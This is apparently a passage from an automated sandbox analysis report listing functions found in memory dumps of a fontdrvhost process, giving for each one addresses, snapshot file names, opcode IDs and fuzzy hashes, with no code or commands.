                                                                    Function 00007FFD9C0DDA3B Relevance: .1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b7425ea255fdad353dfbaa1d9aef34b139280f56fa1768f1295cb34adf51304
                                                                    • Instruction ID: bed94484a87b267f5c399e364f936a4ae534b528eadb436b35617acafa39558f
                                                                    • Opcode Fuzzy Hash: 2b7425ea255fdad353dfbaa1d9aef34b139280f56fa1768f1295cb34adf51304
                                                                    • Instruction Fuzzy Hash: 93216030E1CB5E8FDB64DB98D8606ED7BB1FF58340F4042AAE00EE3291EB246805DB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D98C2 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 66ce724dafeb42fe7dab5be988593ae7b7efdb9e80096655efcf59ca5df4070d
                                                                    • Instruction ID: 616b57c4b2867b359ea5ff9db9e849b94c2fc35b3d42e0bb0192a946cc299874
                                                                    • Opcode Fuzzy Hash: 66ce724dafeb42fe7dab5be988593ae7b7efdb9e80096655efcf59ca5df4070d
                                                                    • Instruction Fuzzy Hash: B321DB71E0891D9FDF98DB58C4A5AECB3B1FF58311F0141AA901EE3295DF35A9818B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DE592 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a8c9ec8e89d453af0ea225a66e9f54c77c084582a45fa64ec69895e139e3e2cc
                                                                    • Instruction ID: 743c5fafca8974c3f88b5a72e305e64a2b5ca83fc765e08d8828339013a29863
                                                                    • Opcode Fuzzy Hash: a8c9ec8e89d453af0ea225a66e9f54c77c084582a45fa64ec69895e139e3e2cc
                                                                    • Instruction Fuzzy Hash: 0021FA30E1891D9FDFA8DB58C4A5AEDB7B1FF58341F1101AAA01EE3291DF35AD418B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC4EF0 Relevance: .1, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 771320ec0614a786e1706eb466be2aed6231a36c23bd48bda3bac25035630c01
                                                                    • Instruction ID: 9847ea80005d66e268a8c2969f72b8a29097cb7fbb49f1e1068fd51813687820
                                                                    • Opcode Fuzzy Hash: 771320ec0614a786e1706eb466be2aed6231a36c23bd48bda3bac25035630c01
                                                                    • Instruction Fuzzy Hash: 1B217451A0F6CA5FE327A2B818341B8AFA06F5316571A45FFD08D8A4E3D94C1B46D3A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC3B62 Relevance: .1, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a02e28f6dfd725a6d513aa07225c03a9f0c1c4d61c9592026fc8c4bea03eac91
                                                                    • Instruction ID: 6710e4d3afa2614d945ebc60919de953cc29cd55e29035298416a3ef32f9cacc
                                                                    • Opcode Fuzzy Hash: a02e28f6dfd725a6d513aa07225c03a9f0c1c4d61c9592026fc8c4bea03eac91
                                                                    • Instruction Fuzzy Hash: F221FC31E1591D9FDFA8EB58C4A6AFDB7B1FF58305F4101A9D00EE3291CA75A941CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D7498 Relevance: .1, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7d463126a6f05111d9b31ab7e462536fbdef4b43829f53f4c8975aecc1cf4b46
                                                                    • Instruction ID: 222639a5a60cac824ccc1a9a3c6fcdd572a284d9970db640a80282447b721caf
                                                                    • Opcode Fuzzy Hash: 7d463126a6f05111d9b31ab7e462536fbdef4b43829f53f4c8975aecc1cf4b46
                                                                    • Instruction Fuzzy Hash: BF212902B0C7574AF779A7BC60759F82BA09F513A0F5503BBF48E891DBFE09684552C2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCA689 Relevance: .1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c65ef9bd1c8c5153aabb60e13fe72524a08d850066a7d4537c10fbdf9745b576
                                                                    • Instruction ID: ec3806b5bdb78dcbb74e47965171cc9cfd32a1de7433c08ea03f3c0035f82eca
                                                                    • Opcode Fuzzy Hash: c65ef9bd1c8c5153aabb60e13fe72524a08d850066a7d4537c10fbdf9745b576
                                                                    • Instruction Fuzzy Hash: CB21FB31E0590D9FDBA8EBA8D4A5ABDB7B1FF58315F0101BAD00ED32A5DE34A941CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD3E3D Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 053bf6e875ef5321ff2c639b45461581a4bbbcff2e8293fefea0e37595d14c7e
                                                                    • Instruction ID: d42b6a7200ec2be2d64c5dfe7e8f121157e533792d954e29ce7a74838a2eab04
                                                                    • Opcode Fuzzy Hash: 053bf6e875ef5321ff2c639b45461581a4bbbcff2e8293fefea0e37595d14c7e
                                                                    • Instruction Fuzzy Hash: CD21C9B1F1E40EDBEBB8DB8484A15BD7761FF94308F520279D00E925E2CA3DBA409661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DF6F5 Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7045ea90e6aefbab860afe0a6e6e939248026eb6c2b773ab9c6ec2ac94d1cd59
                                                                    • Instruction ID: 82ffdcfbe867e1f1071a4b7770ac76d4939ff9156fda65e21196355127fd3a3b
                                                                    • Opcode Fuzzy Hash: 7045ea90e6aefbab860afe0a6e6e939248026eb6c2b773ab9c6ec2ac94d1cd59
                                                                    • Instruction Fuzzy Hash: DA21D572F0975A8FEB64FBE894662E877F0EF59354F14427AE04DC3297EE2868418740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC4CCA Relevance: .1, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 247b58052a5715e3a0d1b2779d1b63b249f60e93cee4bcc17c403259f17f1b23
                                                                    • Instruction ID: 48b7b188628b82c18446676f43588d31bb52ed2482b766ee63edee56bf8aacdd
                                                                    • Opcode Fuzzy Hash: 247b58052a5715e3a0d1b2779d1b63b249f60e93cee4bcc17c403259f17f1b23
                                                                    • Instruction Fuzzy Hash: 8F11D572E0A6498FE725FBA894622EC77E1FF85314F02017ED049C72D6DE246942C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC4B09 Relevance: .1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1f012ae1390610b1f6998a9d05531dc04327c087fa1122fd07d79fc51978620f
                                                                    • Instruction ID: 3624160d18573c77b14a6a9e37916aa877b9afea1e17f57e76df128a2ec7e1e1
                                                                    • Opcode Fuzzy Hash: 1f012ae1390610b1f6998a9d05531dc04327c087fa1122fd07d79fc51978620f
                                                                    • Instruction Fuzzy Hash: 9B110832E0F68D9FE775EAA888256B93BB0FB52340F06057BD009D71E2DE581E45C351
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D95C1 Relevance: .1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 872f148c9c8103f2b178bdd21c7000544241b9aaa29d3158c3ca8e5de429bccb
                                                                    • Instruction ID: b5c1f4563d3cba8382dbb581edc442c24fefda3603d17bcbc75568b8e0a6ed7d
                                                                    • Opcode Fuzzy Hash: 872f148c9c8103f2b178bdd21c7000544241b9aaa29d3158c3ca8e5de429bccb
                                                                    • Instruction Fuzzy Hash: 7A11E012F4D39386FA7926E468314BD2674AF457A0F5903BAF84E830C6FE0D28853392
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCB734 Relevance: .1, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e92cc6ce6aaf7058d758e9dcdc3682168b67961d6683fef343bf9eb83d9a44b
                                                                    • Instruction ID: a9de29a0916458a8e0f7dc14d7cb72c3865ed45b69aa9a784523961516ff2d39
                                                                    • Opcode Fuzzy Hash: 5e92cc6ce6aaf7058d758e9dcdc3682168b67961d6683fef343bf9eb83d9a44b
                                                                    • Instruction Fuzzy Hash: 02113D31F1991D8FDB64EB9C94A19BCB3A1FF89714B15827AD40ED3291CE24BD11C780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DF4C5 Relevance: .1, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e40d0516c90b98b41f8e07d851d03b3b68124dd77775c18bb5e91574e48e5919
                                                                    • Instruction ID: 2ff2b43221953df0f15cb9d41543a61de504ca222eeca3416e80c873aac6a420
                                                                    • Opcode Fuzzy Hash: e40d0516c90b98b41f8e07d851d03b3b68124dd77775c18bb5e91574e48e5919
                                                                    • Instruction Fuzzy Hash: 5511D672F08B4E9FD7749A9894282F937F1EBA8350F00427BE10DE3295EF69AD055781
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA124A0 Relevance: .1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2132802424.00007FFD9BA0B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9ba0b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7e4ef2b69a5dcb88511f799b117225a16f85bb7a143ea953b74d4fb77799f373
                                                                    • Instruction ID: 5e025b3b59ff4d5b6876892c7d5b3ee0bafd7c26626abb2e8b8e13362f5fef8f
                                                                    • Opcode Fuzzy Hash: 7e4ef2b69a5dcb88511f799b117225a16f85bb7a143ea953b74d4fb77799f373
                                                                    • Instruction Fuzzy Hash: A3118F31A08A4D8FDF85EFA8C898AEA7BF0FF54305F0401AAD419D7151DA31A584CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DAA7C Relevance: .1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 149dbb8f24f3a35513e3fda55a13e14de6aaab994e4fb95ca62f833113a1fd60
                                                                    • Instruction ID: 2017add94f6099dfa3ece0fd8bcab1de947be9f8b08ce2c57f1a1418bffe21ed
                                                                    • Opcode Fuzzy Hash: 149dbb8f24f3a35513e3fda55a13e14de6aaab994e4fb95ca62f833113a1fd60
                                                                    • Instruction Fuzzy Hash: E8110431F09A479FD764AB6494214FA73B0FF51250F00467BE00EC34D2EF2869059790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC5800 Relevance: .1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aae09cef7b7b053cff9dbb9c53c9dae4900879548dc78ca6becbd643ad12df87
                                                                    • Instruction ID: 52e2270ca44b9891215a622e14f4f21a7cc28b26c55b8d3ee0e1559745f5b89d
                                                                    • Opcode Fuzzy Hash: aae09cef7b7b053cff9dbb9c53c9dae4900879548dc78ca6becbd643ad12df87
                                                                    • Instruction Fuzzy Hash: 50118231B1590A8AD764FFA8D0215FAB391FF54319F01463AD40EC35D6DE28BA45C780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0E0220 Relevance: .1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3db7fedf07314a23f97f518f537fa08a4d9c1019bc4ff65f3cda65f7f8d89825
                                                                    • Instruction ID: 90082cb1f25859be685cc8a694a8d1412ea90eaf7987c0141148a2c80623ca48
                                                                    • Opcode Fuzzy Hash: 3db7fedf07314a23f97f518f537fa08a4d9c1019bc4ff65f3cda65f7f8d89825
                                                                    • Instruction Fuzzy Hash: 3F11BF31B08A0B9AEB64FB64D0615FAB3E1FF94385F40063AE00EC3582DF29A8549790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBE2D9E Relevance: .1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b2085ea5bff55fd1210e195a60db4143d4bee62655c4616d6f447c5a798861fd
                                                                    • Instruction ID: 9fe88d21607f7794cb6c42763a72a4ad5fd4f3cc9b1c17002e177e31e6721935
                                                                    • Opcode Fuzzy Hash: b2085ea5bff55fd1210e195a60db4143d4bee62655c4616d6f447c5a798861fd
                                                                    • Instruction Fuzzy Hash: 21118F30F1990A8EDB64FB68D4615FA73A1FF94309F41463AD44AC35E6CE38A9458780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC9220 Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a4b0105a96f4ddb193713f1c7bef47ba69783a3a3da7d7fbddda07b52943b67
                                                                    • Instruction ID: 1256cd22280aa49f6c923d1a028cb0e7113e8ad777b4632cb920f721ae0a7700
                                                                    • Opcode Fuzzy Hash: 0a4b0105a96f4ddb193713f1c7bef47ba69783a3a3da7d7fbddda07b52943b67
                                                                    • Instruction Fuzzy Hash: 1C010471F0A60D9FE770EAAC84382BE75A1FB49345F01403AD40ED72E1DE656D01C381
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCC2F0 Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d5a4441a53211e34f7add87eda1e4b8096185ec6371564d9809cb3c95ef3a77
                                                                    • Instruction ID: 1ae1388f66b7955b3724af4b3a18bfba6367ce16cbdb1f6dc749dffca0dfe73f
                                                                    • Opcode Fuzzy Hash: 1d5a4441a53211e34f7add87eda1e4b8096185ec6371564d9809cb3c95ef3a77
                                                                    • Instruction Fuzzy Hash: D211C430F0990A9EDB64FF68E4254F673E0FFA4208B40063AD04EC31E6CE38A941C780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DF539 Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b5b034cd754db6d803c2c0b128ce2430ecbfb59e52cf770dceb3fa77b2c0a566
                                                                    • Instruction ID: b69f12e0611f9a345deceb956830f5e2968648bcf0487677927f6fab18a2acac
                                                                    • Opcode Fuzzy Hash: b5b034cd754db6d803c2c0b128ce2430ecbfb59e52cf770dceb3fa77b2c0a566
                                                                    • Instruction Fuzzy Hash: 57010832A0974A5FD370DAA488682E53AF1EB55390F04427BE00DE3151EE6859458391
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC567E Relevance: .1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c108dec0b9a279250a34a7261219bb93a7055ac617b473e501216dd8156c3ff
                                                                    • Instruction ID: c0ad12ae93e363390e928ff0fd0f6f8d881f4bc045a22a85b4deca263c84cb67
                                                                    • Opcode Fuzzy Hash: 2c108dec0b9a279250a34a7261219bb93a7055ac617b473e501216dd8156c3ff
                                                                    • Instruction Fuzzy Hash: A1118E31B0550A8FE725EE98D4662F57394FB95319F11453BD509C36E0DB29AA90CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0E009E Relevance: .1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fa4ebd6e331336cb6af8eafdff783a8e3b8b668cf67e4e3796640b24b16a3c65
                                                                    • Instruction ID: 4646f79609179770be07562ef90b0e4fd3de962474101fa8ad9ca306ab43c45e
                                                                    • Opcode Fuzzy Hash: fa4ebd6e331336cb6af8eafdff783a8e3b8b668cf67e4e3796640b24b16a3c65
                                                                    • Instruction Fuzzy Hash: C5110431B445078FE724AF98E4652E673E0FB95399F50463BD51DC3680DB39A9608B80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DA8FE Relevance: .1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 10dd1ce8918a3f37fb78112b6543f426ab5550d5a0bdbd81397bf1dd2116f2d1
                                                                    • Instruction ID: e1da9b8990a38c478af22c6a86abb3ae21895a636cd0ad9bb29bb144709bff74
                                                                    • Opcode Fuzzy Hash: 10dd1ce8918a3f37fb78112b6543f426ab5550d5a0bdbd81397bf1dd2116f2d1
                                                                    • Instruction Fuzzy Hash: 2E110431B046078FE724AF58D4212E673A4FB95355F10473BE50DC36C0EB39AA508B80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCC16E Relevance: .1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 95b739312845735a88a828101c4d7c431de191a5487b0fb5ba0d19f701a27811
                                                                    • Instruction ID: fcebd36a4d76209902747413e94c68212d929b1936369e53e8d9cca0b5c97e56
                                                                    • Opcode Fuzzy Hash: 95b739312845735a88a828101c4d7c431de191a5487b0fb5ba0d19f701a27811
                                                                    • Instruction Fuzzy Hash: EF11E131B0540A8FE724EF9CE4252F57390FBA5319F11063AD509C72E0CB39A950C780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D9542 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ecab01fb381493a2ccbe7887ecc040611a6541fdc55b3dc26c3fab18b262a69f
                                                                    • Instruction ID: 36c2b3f7640e2d02b79c9988abee71c0ace4c5bb6f0ccf331ae8353f42aee682
                                                                    • Opcode Fuzzy Hash: ecab01fb381493a2ccbe7887ecc040611a6541fdc55b3dc26c3fab18b262a69f
                                                                    • Instruction Fuzzy Hash: 11118334E2891EDFDBA8EB98D4A09ADB7B1FF58340F500679E00EE3295DB3468419B50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA0FA78 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2132802424.00007FFD9BA0B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9ba0b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 85ba806d8b0e693e43dcadcbed138610b0bffb359638b809900407908f3fbd5a
                                                                    • Instruction ID: c0610fb9783c225f0c4ac2b2b4cc1e612228af5539e85e91fdbd397a23783ac4
                                                                    • Opcode Fuzzy Hash: 85ba806d8b0e693e43dcadcbed138610b0bffb359638b809900407908f3fbd5a
